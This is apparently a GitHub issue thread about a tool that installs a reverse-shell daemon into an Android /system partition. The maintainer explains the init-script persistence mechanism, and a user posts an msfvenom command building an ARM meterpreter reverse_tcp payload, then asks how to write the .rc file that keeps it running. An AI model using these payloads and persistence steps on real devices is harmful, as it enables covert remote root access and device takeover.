-
Notifications
You must be signed in to change notification settings - Fork 11
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Question/Help #1
Comments
Hi, thanks for your interest to the project. The The idea is to build a "native" Android binary for ARM architecture CPU, put it alongside other system binaries on your smartphone (
So create file
Once both files are placed into the /system partition, you will have your daemon running and will be able to connect to your phone from your server and do anything you want there with root privileges. The installer that is generated by the tool in this repo will generate a flashable zip file that can be installed via TWRP or other custom recovery projects that can provide you adb sideload mode. It will automatically create /system/etc/init/revshell.rc file for your with all the content and put it into the /system. Hope it helps, sorry for a long answer |
Thanks for the explanation but my problem is that I've tried everything and I can't install magisk on my phone. I think my model is incompatible but I have root access and so I would like to know is it possible to do this without magisk, just with root access? |
Hm, perhaps I didn't understand you properly. So your problem is that you already have root but do not have magisk? Is that some multimedia device? Or an emulator? Technically, you can install this binary and service script into your system, but you have to make sure that there are no working system integrity measures, like verified boot and dm-verity. If there are none, then just remount your partition or make a mount overlay to add new files to your system fs. However, I must warn you, if there are some measures then you device might be bricked after you write new files to /system. Please be cautious. I cannot give you any advice, you have to understand risks and investigate that yourself |
Hi could you tell me something if I have a rooted android device then how do I:
msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 -f elf -o revshell
I copy the revshell binary to /system/bin/ and then I create a revshell.rc script and copy it to /system/etc/init/
but explain to me what the content of this rc script would look like? What do I have to put inside for it to work?
The text was updated successfully, but these errors were encountered: